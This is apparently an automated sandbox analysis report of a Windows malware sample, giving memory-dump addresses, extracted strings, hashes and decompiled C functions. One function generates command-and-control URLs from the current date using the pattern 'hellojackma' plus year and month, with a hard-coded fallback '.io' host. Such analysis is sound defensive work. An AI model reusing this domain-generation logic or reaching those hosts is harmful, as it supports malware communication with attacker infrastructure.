0x00404ead
0x00404eb1
0x00404eb5
0x00404eb9
0x00404ebd
0x00404ec1
0x00404ec5
0x00404ec9
0x00404ecd
0x00404ed1
0x00404ed5
0x00404ed9
0x00404edd
0x00404ee1
0x00404ee5
0x00404ee9
0x00404eed
0x00404ef1
0x00404ef5
0x00404eff
0x00404f08
0x00404f11
0x00404f19
0x00404f22
0x00404f2b
0x00404f34
0x00404f3c
0x00404f4b
0x00404f4e
0x00404f52
0x00404f53
0x00404f5c
0x00404f60
0x00404f6c
0x00404f78
0x00404f7b
0x00404f84
0x00404fa4
0x00404fa7
0x00404fad
0x00404faf
0x00404fb8
0x00404fd8
0x00404fdb
0x00404fe1
0x00404feb

Strings

o, xrefs: 00404EC1
L, xrefs: 00404ECD
y, xrefs: 00404EE5
G, xrefs: 00404E81
d, xrefs: 00404EC9
c, xrefs: 00404E99
d, xrefs: 00404EA5
A, xrefs: 00404EF1
L, xrefs: 00404EBD
d, xrefs: 00404EA1
e, xrefs: 00404EAD
r, xrefs: 00404EE1
r, xrefs: 00404EA9
r, xrefs: 00404E91
P, xrefs: 00404E8D
t, xrefs: 00404E89
a, xrefs: 00404EDD
e, xrefs: 00404E85
A, xrefs: 00404E9D
b, xrefs: 00404ED5
a, xrefs: 00404EC5
x, xrefs: 00404EED
o, xrefs: 00404E95
i, xrefs: 00404ED1
E, xrefs: 00404EE9
s, xrefs: 00404EB1
s, xrefs: 00404EB5
r, xrefs: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: A$A$E$G$L$L$P$a$a$b$c$d$d$d$e$e$i$o$o$r$r$r$r$s$s$t$x$y
API String ID: 0-2414563060
Opcode ID: 8005dc6ba0998565b83109a0b8f5c3e26b77b36a209bb3f8b293a8a77511ee85
Instruction ID: e1ae51c1aaf66bcce95c14f3d3e403b9064ca1e152efad381cdf08257a0fb7e6
Opcode Fuzzy Hash: 8005dc6ba0998565b83109a0b8f5c3e26b77b36a209bb3f8b293a8a77511ee85
Instruction Fuzzy Hash: 16413570D092C9DEEB01CBA8C1587DEBFB16F16708F184088D5843B392C7BE1659CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10022710, Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 292
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10022710(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				struct _SYSTEMTIME _v36;
				char _v303;
				char _v304;
				char _v332;
				char _v360;
				char _v388;
				char _v416;
				char _v444;
				char _v472;
				char _v500;
				char _v528;
				char _v556;
				char _v584;
				char _v612;
				char _v640;
				char _v668;
				signed int _v672;
				signed int _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				signed int _v764;
				signed int _v768;
				signed int _v772;
				intOrPtr _t224;

				_push(0xffffffff);
				_push(E10023135);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t224;
				_v672 = 0;
				E10001160( &_v332, __eflags, "http://");
				_v8 = 0;
				_v20 = 0;
				_v304 = 0;
				E1000CF80(__edi,  &_v303, 0, 0x103);
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetLocalTime( &_v36);
				_v676 = _a8;
				_t231 = _v676 - 6;
				if(_v676 <= 6) {
					switch( *((intOrPtr*)(_v676 * 4 +  &M10022CD8))) {
						case 0:
							_push(_v36.wMonth & 0x0000ffff);
							E1000CCA3(_t222,  &_v304, "hellojackma%04d%02d", _v36.wYear & 0x0000ffff);
							_v20 = E1001A4E0(__ebx,  &_v304, _t222, __esi, _t231,  &_v304);
							_v680 = E10001160( &_v360, _t231, _v20);
							_v684 = _v680;
							_v8 = 1;
							E10001A90( &_v332, _v684);
							_v8 = 0;
							E100011A0( &_v360);
							_push(_v20);
							E1000CA40(__ebx, _t222, __esi, _t231);
							_v688 = E10001160( &_v388, _t231, ".com/");
							_v692 = _v688;
							_v8 = 2;
							E10001A90( &_v332, _v692);
							_v8 = 0;
							E100011A0( &_v388);
							goto L9;
						case 1:
							__eax = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__ecx = _v36.wYear & 0x0000ffff;
							__edx =  &_v304;
							E1000CCA3(__edi, __edx, "hellojackma%04d%02d1", _v36.wYear & 0x0000ffff) =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__ecx = _v20;
							__ecx =  &_v416;
							_v696 = E10001160( &_v416, __eflags, _v20);
							__edx = _v696;
							_v700 = _v696;
							_v8 = 3;
							__eax = _v700;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v700);
							_v8 = 0;
							__ecx =  &_v416;
							__eax = E100011A0( &_v416);
							__ecx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v444;
							_v704 = E10001160( &_v444, __eflags, ".com/");
							__edx = _v704;
							_v708 = _v704;
							_v8 = 4;
							__eax = _v708;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v708);
							_v8 = 0;
							__ecx =  &_v444;
							__eax = E100011A0(__ecx);
							goto L9;
						case 2:
							__ecx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__edx = _v36.wYear & 0x0000ffff;
							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d2", __edx);
							__ecx =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__edx = _v20;
							__ecx =  &_v472;
							_v712 = E10001160( &_v472, __eflags, _v20);
							__eax = _v712;
							_v716 = _v712;
							_v8 = 5;
							__ecx = _v716;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v716);
							_v8 = 0;
							__ecx =  &_v472;
							__eax = E100011A0( &_v472);
							__edx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v500;
							_v720 = E10001160( &_v500, __eflags, ".com/");
							__eax = _v720;
							_v724 = _v720;
							_v8 = 6;
							__ecx = _v724;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v724);
							_v8 = 0;
							__ecx =  &_v500;
							__eax = E100011A0(__ecx);
							goto L9;
						case 3:
							__edx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__eax = _v36.wYear & 0x0000ffff;
							__ecx =  &_v304;
							__eax = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d3", _v36.wYear & 0x0000ffff);
							__edx =  &_v304;
							_v20 = E1001A4E0(__ebx,  &_v304, __edi, __esi, __eflags,  &_v304);
							__eax = _v20;
							__ecx =  &_v528;
							_v728 = E10001160( &_v528, __eflags, _v20);
							__ecx = _v728;
							_v732 = _v728;
							_v8 = 7;
							__edx = _v732;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v732);
							_v8 = 0;
							__ecx =  &_v528;
							E100011A0( &_v528) = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v556;
							_v736 = E10001160( &_v556, __eflags, ".com/");
							__ecx = _v736;
							_v740 = _v736;
							_v8 = 8;
							__edx = _v740;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v740);
							_v8 = 0;
							__ecx =  &_v556;
							__eax = E100011A0(__ecx);
							goto L9;
						case 4:
							__eax = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__ecx = _v36.wYear & 0x0000ffff;
							__edx =  &_v304;
							E1000CCA3(__edi, __edx, "hellojackma%04d%02d4", _v36.wYear & 0x0000ffff) =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__ecx = _v20;
							__ecx =  &_v584;
							_v744 = E10001160( &_v584, __eflags, _v20);
							__edx = _v744;
							_v748 = _v744;
							_v8 = 9;
							__eax = _v748;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v748);
							_v8 = 0;
							__ecx =  &_v584;
							__eax = E100011A0( &_v584);
							__ecx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v612;
							_v752 = E10001160( &_v612, __eflags, ".com/");
							__edx = _v752;
							_v756 = _v752;
							_v8 = 0xa;
							__eax = _v756;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v756);
							_v8 = 0;
							__ecx =  &_v612;
							__eax = E100011A0(__ecx);
							goto L9;
						case 5:
							__ecx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__edx = _v36.wYear & 0x0000ffff;
							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d5", __edx);
							__ecx =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__edx = _v20;
							__ecx =  &_v640;
							_v760 = E10001160( &_v640, __eflags, _v20);
							__eax = _v760;
							_v764 = _v760;
							_v8 = 0xb;
							__ecx = _v764;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v764);
							_v8 = 0;
							__ecx =  &_v640;
							__eax = E100011A0( &_v640);
							__edx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v668;
							_v768 = E10001160( &_v668, __eflags, ".com/");
							__eax = _v768;
							_v772 = _v768;
							_v8 = 0xc;
							__ecx = _v772;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v772);
							_v8 = 0;
							__ecx =  &_v668;
							__eax = E100011A0(__ecx);
							goto L9;
						case 6:
							__ecx =  &_v332;
							__eax = E10001AB0(__ecx, __eflags, "back19e64ea00d6ecfe1.io/");
							goto L9;
					}
				}
				L9:
				E10001110(_a4, _t231,  &_v332);
				_v672 = _v672 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v332);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x10022713
0x10022715
0x10022720
0x10022721
0x1002272e
0x10022743
0x10022748
0x1002274f
0x10022756
0x1002276b
0x10022773
0x1002277b
0x1002277e
0x10022781
0x10022784
0x1002278c
0x10022795
0x1002279b
0x100227a2
0x100227ae
0x00000000
0x100227b9
0x100227cb
0x100227e2
0x100227f4
0x10022800
0x10022806
0x10022817
0x1002281c
0x10022826
0x1002282e
0x1002282f
0x10022847
0x10022853
0x10022859
0x1002286a
0x1002286f
0x10022879
0x00000000
0x00000000
0x10022883
0x10022887
0x10022888
0x10022892
0x100228a1
0x100228b0
0x100228b3
0x100228b7
0x100228c2
0x100228c8
0x100228ce
0x100228d4
0x100228d8
0x100228df
0x100228e5
0x100228ea
0x100228ee
0x100228f4
0x100228f9
0x100228fc
0x100228fd
0x10022902
0x1002290a
0x10022915
0x1002291b
0x10022921
0x10022927
0x1002292b
0x10022932
0x10022938
0x1002293d
0x10022941
0x10022947
0x00000000
0x00000000
0x10022951
0x10022955
0x10022956
0x10022967
0x1002296f
0x1002297e
0x10022981
0x10022985
0x10022990
0x10022996
0x1002299c
0x100229a2
0x100229a6
0x100229ad
0x100229b3
0x100229b8
0x100229bc
0x100229c2
0x100229c7
0x100229ca
0x100229cb
0x100229d0
0x100229d8
0x100229e3
0x100229e9
0x100229ef
0x100229f5
0x100229f9
0x10022a00
0x10022a06
0x10022a0b
0x10022a0f
0x10022a15
0x00000000
0x00000000
0x10022a1f
0x10022a23
0x10022a24
0x10022a2e
0x10022a35
0x10022a3d
0x10022a4c
0x10022a4f
0x10022a53
0x10022a5e
0x10022a64
0x10022a6a
0x10022a70
0x10022a74
0x10022a7b
0x10022a81
0x10022a86
0x10022a8a
0x10022a95
0x10022a98
0x10022a99
0x10022a9e
0x10022aa6
0x10022ab1
0x10022ab7
0x10022abd
0x10022ac3
0x10022ac7
0x10022ace
0x10022ad4
0x10022ad9
0x10022add
0x10022ae3
0x00000000
0x00000000
0x10022aed
0x10022af1
0x10022af2
0x10022afc
0x10022b0b
0x10022b1a
0x10022b1d
0x10022b21
0x10022b2c
0x10022b32
0x10022b38
0x10022b3e
0x10022b42
0x10022b49
0x10022b4f
0x10022b54
0x10022b58
0x10022b5e
0x10022b63
0x10022b66
0x10022b67
0x10022b6c
0x10022b74
0x10022b7f
0x10022b85
0x10022b8b
0x10022b91
0x10022b95
0x10022b9c
0x10022ba2
0x10022ba7
0x10022bab
0x10022bb1
0x00000000
0x00000000
0x10022bbb
0x10022bbf
0x10022bc0
0x10022bd1
0x10022bd9
0x10022be8
0x10022beb
0x10022bef
0x10022bfa
0x10022c00
0x10022c06
0x10022c0c
0x10022c10
0x10022c17
0x10022c1d
0x10022c22
0x10022c26
0x10022c2c
0x10022c31
0x10022c34
0x10022c35
0x10022c3a
0x10022c42
0x10022c4d
0x10022c53
0x10022c59
0x10022c5f
0x10022c63
0x10022c6a
0x10022c70
0x10022c75
0x10022c79
0x10022c7f
0x00000000
0x00000000
0x10022c8b
0x10022c91
0x00000000
0x00000000
0x100227ae
0x10022c96
0x10022ca0
0x10022cae
0x10022cb4
0x10022cc1
0x10022ccc
0x10022cd6

APIs

_memset.LIBCMT ref: 1002276B
GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
_sprintf.LIBCMT ref: 100227CB
_sprintf.LIBCMT ref: 10022899
_sprintf.LIBCMT ref: 10022967
_sprintf.LIBCMT ref: 10022A35
_sprintf.LIBCMT ref: 10022B03

Strings

hellojackma%04d%02d1, xrefs: 1002288D
.com/, xrefs: 100229D3
http://, xrefs: 10022738
.com/, xrefs: 10022B6F
hellojackma%04d%02d2, xrefs: 1002295B
.com/, xrefs: 10022837
.com/, xrefs: 10022905
hellojackma%04d%02d4, xrefs: 10022AF7
hellojackma%04d%02d3, xrefs: 10022A29
hellojackma%04d%02d, xrefs: 100227BF
.com/, xrefs: 10022AA1

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _sprintf$LocalTime_memset
String ID: .com/$.com/$.com/$.com/$.com/$hellojackma%04d%02d$hellojackma%04d%02d1$hellojackma%04d%02d2$hellojackma%04d%02d3$hellojackma%04d%02d4$http://
API String ID: 3210278488-2045531967
Opcode ID: ca31bb3747dda2b24ef88613d4a23574554048c90a18ee74a8bd737135967faa
Instruction ID: fb4cb11577b3c86e7dfd5e3107c57607ba699950bdf5b0f3fc4b2b3aa76d18be
Opcode Fuzzy Hash: ca31bb3747dda2b24ef88613d4a23574554048c90a18ee74a8bd737135967faa
Instruction Fuzzy Hash: E3D137B5C012689BEB24DBA4CC85BEEB7B4FF59340F5041D9E10967291EB346B84CF92

Uniqueness

Uniqueness Score: -1.00%

Function 004093D5, Relevance: 26.7, Strings: 21, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E004093D5(signed int* _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
				signed int _v8;
				char _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v58;
				signed int _v62;
				signed int _v66;
				signed int _v68;
				char _v73;
				char _v96;
				signed int _t121;
				intOrPtr _t141;
				intOrPtr _t143;
				signed int _t146;
				intOrPtr* _t148;

				_t148 = _a12;
				_v16 =  &_v96;
				_t121 = 0;
				_t146 = 1;
				_v44 = 0;
				_v28 = _t146;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v36 = 0;
				_v48 = 0;
				_v52 = 0;
				_v32 = 0;
				_v12 = 0;
				_v24 = 0;
				_a12 = _t148;
				L1:
				_t143 =  *_t148;
				if(_t143 == 0x20 || _t143 == 9 || _t143 == 0xa || _t143 == 0xd) {
					_t148 = _t148 + 1;
					goto L1;
				}
				_push(4);
				while(1) {
					L7:
					_t141 =  *_t148;
					_t148 = _t148 + 1;
					if(_t121 > 0xb) {
						break;
					}
					switch( *((intOrPtr*)(_t121 * 4 +  &M00409876))) {
						case 0:
							__eflags = _t141 - 0x31;
							if(_t141 < 0x31) {
								L12:
								__eflags = _t141 -  *0x40ff24; // 0x2e
								if(__eflags != 0) {
									_t137 = _t141 - 0x2b;
									__eflags = _t137;
									if(_t137 == 0) {
										_v44 = _v44 & 0x00000000;
										_push(2);
										_pop(_t121);
										goto L7;
									}
									_t139 = _t137;
									__eflags = _t139;
									if(_t139 == 0) {
										_push(2);
										_v44 = 0x8000;
										_pop(_t121);
										goto L7;
									}
									__eflags = _t139 != 3;
									if(_t139 != 3) {
										goto L109;
									}
									goto L36;
								}
								goto L13;
							}
							__eflags = _t141 - 0x39;
							if(_t141 > 0x39) {
								goto L12;
							}
							goto L11;
						case 1:
							__eflags = __bl - 0x31;
							_v20 = __edx;
							if(__bl < 0x31) {
								L22:
								__eflags = __bl -  *0x40ff24; // 0x2e
								if(__eflags == 0) {
									goto L47;
								}
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									goto L31;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								__eflags = __bl - 0x30;
								if(__bl == 0x30) {
									goto L36;
								}
								goto L26;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L11;
							}
							goto L22;
						case 2:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L34:
								__eflags = __bl -  *0x40ff24; // 0x2e
								if(__eflags == 0) {
									L13:
									_push(5);
									goto L90;
								}
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L94;
								}
								L36:
								_t121 = _t146;
								goto L7;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								L11:
								_push(3);
								goto L81;
							}
							goto L34;
						case 3:
							_v20 = __edx;
							while(1) {
								__eflags =  *0x40ff20 - __edx; // 0x1
								if(__eflags <= 0) {
									__ecx =  *0x40fd10; // 0x40fd1a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 0x000000ff & __esi;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
									_pop(__ecx);
									_pop(__ecx);
									_push(1);
									_pop(__edx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v8 - 0x19;
								if(_v8 >= 0x19) {
									_t31 =  &_v12;
									 *_t31 = _v12 + 1;
									__eflags =  *_t31;
								} else {
									__eax = _v16;
									_v8 = _v8 + 1;
									__bl = __bl - 0x30;
									_v16 =  &(_v16[1]);
									 *_v16 = __bl;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl -  *0x40ff24; // 0x2e
							if(__eflags != 0) {
								goto L58;
							}
							L47:
							__eax = __esi;
							goto L7;
						case 4:
							__eflags = _v8;
							_v20 = __edx;
							_v40 = __edx;
							if(_v8 != 0) {
								while(1) {
									L51:
									__eflags =  *0x40ff20 - __edx; // 0x1
									if(__eflags <= 0) {
										__ecx =  *0x40fd10; // 0x40fd1a
										__eax = __bl & 0x000000ff;
										__eax = __bl & 0x000000ff & __esi;
										__eflags = __eax;
									} else {
										__eax = __bl & 0x000000ff;
										__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
										_pop(__ecx);
										_pop(__ecx);
										_push(1);
										_pop(__edx);
									}
									__eflags = __eax;
									if(__eax == 0) {
										break;
									}
									__eflags = _v8 - 0x19;
									if(_v8 < 0x19) {
										__eax = _v16;
										_v8 = _v8 + 1;
										__bl = __bl - 0x30;
										_v16 =  &(_v16[1]);
										_t46 =  &_v12;
										 *_t46 = _v12 - 1;
										__eflags =  *_t46;
										 *_v16 = __bl;
									}
									__bl =  *__edi;
									__edi = __edi + 1;
								}
								L58:
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									L31:
									__edi = __edi - 1;
									_push(0xb);
									goto L90;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								L26:
								__eflags = __bl - 0x43;
								if(__bl <= 0x43) {
									goto L109;
								}
								__eflags = __bl - 0x45;
								if(__bl <= 0x45) {
									L30:
									_push(6);
									goto L90;
								}
								__eflags = __bl - 0x63;
								if(__bl <= 0x63) {
									goto L109;
								}
								__eflags = __bl - 0x65;
								if(__bl > 0x65) {
									goto L109;
								}
								goto L30;
							} else {
								goto L49;
							}
							while(1) {
								L49:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L51;
								}
								_v12 = _v12 - 1;
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							goto L51;
						case 5:
							__eflags =  *0x40ff20 - __edx;
							_v40 = __edx;
							if( *0x40ff20 <= __edx) {
								__ecx =  *0x40fd10; // 0x40fd1a
								__eax = __bl & 0x000000ff;
								__eax = __bl & 0x000000ff & __esi;
								__eflags = __eax;
							} else {
								__eax = __bl & 0x000000ff;
								__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
								_pop(__ecx);
								_pop(__ecx);
								_push(1);
								_pop(__edx);
							}
							__eflags = __eax;
							if(__eax == 0) {
								goto L94;
							} else {
								__eax = __esi;
								goto L82;
							}
						case 6:
							_t51 = __edi - 2; // 0x0
							__ecx = _t51;
							__eflags = __bl - 0x31;
							_a12 = __ecx;
							if(__bl < 0x31) {
								L68:
								__eax = __bl;
								__eax = __bl - 0x2b;
								__eflags = __eax;
								if(__eax == 0) {
									goto L89;
								}
								__eax = __eax - 1;
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L88;
								}
								__eax = __eax - 3;
								__eflags = __eax;
								if(__eax != 0) {
									goto L110;
								}
								goto L71;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L80;
							}
							goto L68;
						case 7:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L83:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									L94:
									__edi = _a12;
									goto L111;
								}
								L71:
								_push(8);
								goto L90;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L83;
							}
							goto L80;
						case 8:
							_v36 = __edx;
							while(1) {
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								goto L109;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L109;
							}
							L80:
							_push(9);
							L81:
							_pop(_t121);
							L82:
							_t148 = _t148 - 1;
							goto L7;
						case 9:
							_v36 = 1;
							__esi = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *0x40ff20 - 1;
								if( *0x40ff20 <= 1) {
									__ecx =  *0x40fd10; // 0x40fd1a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__ecx = __bl;
								_t66 = (__esi + __esi * 4) * 2; // -44
								__esi = __ecx + _t66 - 0x30;
								__eflags = __esi - 0x1450;
								if(__esi > 0x1450) {
									__esi = 0x1451;
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							_v32 = __esi;
							while(1) {
								__eflags =  *0x40ff20 - 1;
								if( *0x40ff20 <= 1) {
									__ecx =  *0x40fd10; // 0x40fd1a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							L109:
							_t148 = _t148 - 1;
							goto L111;
						case 0xa:
							goto L92;
						case 0xb:
							__eflags = _a28;
							if(_a28 == 0) {
								_push(0xa);
								__edi = __edi - 1;
								__eflags = __edi;
								_pop(__eax);
								goto L92;
							}
							__eax = __bl;
							_t55 = __edi - 1; // 0x1
							__ecx = _t55;
							__eax = __bl - 0x2b;
							__eflags = __eax;
							_a12 = __ecx;
							if(__eax == 0) {
								L89:
								_push(7);
								L90:
								_pop(_t121);
								goto L7;
							}
							__eax = __eax - 1;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								L110:
								__edi = __ecx;
								L111:
								__eflags = _v20;
								 *_a8 = _t148;
								if(_v20 == 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									_v24 = 4;
									L138:
									_t144 = _a4;
									_t124 = _t123 | _v44;
									__eflags = _t124;
									_t144[1] = _t150;
									_t144[0] = _t142;
									_t144[2] = _t124;
									 *_t144 = _t147;
									return _v24;
								}
								_push(0x18);
								_pop(_t126);
								__eflags = _v8 - _t126;
								if(_v8 <= _t126) {
									_t127 = _v16;
								} else {
									__eflags = _v73 - 5;
									if(_v73 >= 5) {
										_t75 =  &_v73;
										 *_t75 = _v73 + 1;
										__eflags =  *_t75;
									}
									_v8 = _t126;
									_t127 = _v16 - 1;
									_v12 = _v12 + 1;
								}
								__eflags = _v8;
								if(_v8 <= 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									goto L129;
								} else {
									while(1) {
										_t127 = _t127 - 1;
										__eflags =  *_t127;
										if( *_t127 != 0) {
											break;
										}
										_v8 = _v8 - 1;
										_v12 = _v12 + 1;
									}
									E0040930E(_t148,  &_v96, _v8,  &_v68);
									_t131 = _v32;
									__eflags = _v28;
									if(_v28 < 0) {
										_t131 =  ~_t131;
									}
									_t132 = _t131 + _v12;
									__eflags = _v36;
									if(_v36 == 0) {
										_t132 = _t132 + _a20;
										__eflags = _t132;
									}
									__eflags = _v40;
									if(_v40 == 0) {
										_t132 = _t132 - _a24;
										__eflags = _t132;
									}
									__eflags = _t132 - 0x1450;
									if(_t132 <= 0x1450) {
										__eflags = _t132 - 0xffffebb0;
										if(_t132 >= 0xffffebb0) {
											E0040A0AC( &_v68, _t132, _a16);
											_t147 = _v68;
											_t142 = _v66;
											_t150 = _v62;
											_t123 = _v58;
											goto L129;
										}
										_v52 = 1;
										goto L128;
									} else {
										_v48 = 1;
										L128:
										_t142 = _a12;
										_t150 = _a12;
										_t123 = _a12;
										_t147 = _a12;
										L129:
										__eflags = _v48;
										if(_v48 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												_t147 = 0;
												_t123 = 0;
												_t150 = 0;
												_t142 = 0;
												__eflags = 0;
												_v24 = 1;
											}
										} else {
											_t142 = 0;
											_t123 = 0x7fff;
											_t150 = 0x80000000;
											_t147 = 0;
											_v24 = 2;
										}
										goto L138;
									}
								}
							}
							L88:
							_v28 = _v28 | 0xffffffff;
							_push(7);
							_pop(__eax);
							goto L7;
					}
				}
				L92:
				if(_t121 == 0xa) {
					goto L111;
				}
				goto L7;
			}

0x004093de
0x004093e6
0x004093e9
0x004093eb
0x004093ec
0x004093ef
0x004093f2
0x004093f5
0x004093f8
0x004093fb
0x004093fe
0x00409401
0x00409404
0x00409407
0x0040940a
0x0040940d
0x00409410
0x00409410
0x00409415
0x00409426
0x00000000
0x00409426
0x00409429
0x0040942c
0x0040942c
0x0040942c
0x0040942e
0x00409432
0x00000000
0x00000000
0x00409438
0x00000000
0x0040943f
0x00409442
0x00409450
0x00409450
0x00409456
0x00409462
0x00409462
0x00409465
0x00409485
0x00409489
0x0040948b
0x00000000
0x0040948b
0x00409468
0x00409468
0x00409469
0x00409479
0x0040947b
0x00409482
0x00000000
0x00409482
0x0040946b
0x0040946e
0x00000000
0x00000000
0x00000000
0x00409474
0x00000000
0x00409456
0x00409444
0x00409447
0x00000000
0x00000000
0x00000000
0x00000000
0x0040948e
0x00409491
0x00409494
0x0040949b
0x0040949b
0x004094a1
0x00000000
0x00000000
0x004094a7
0x004094aa
0x00000000
0x00000000
0x004094ac
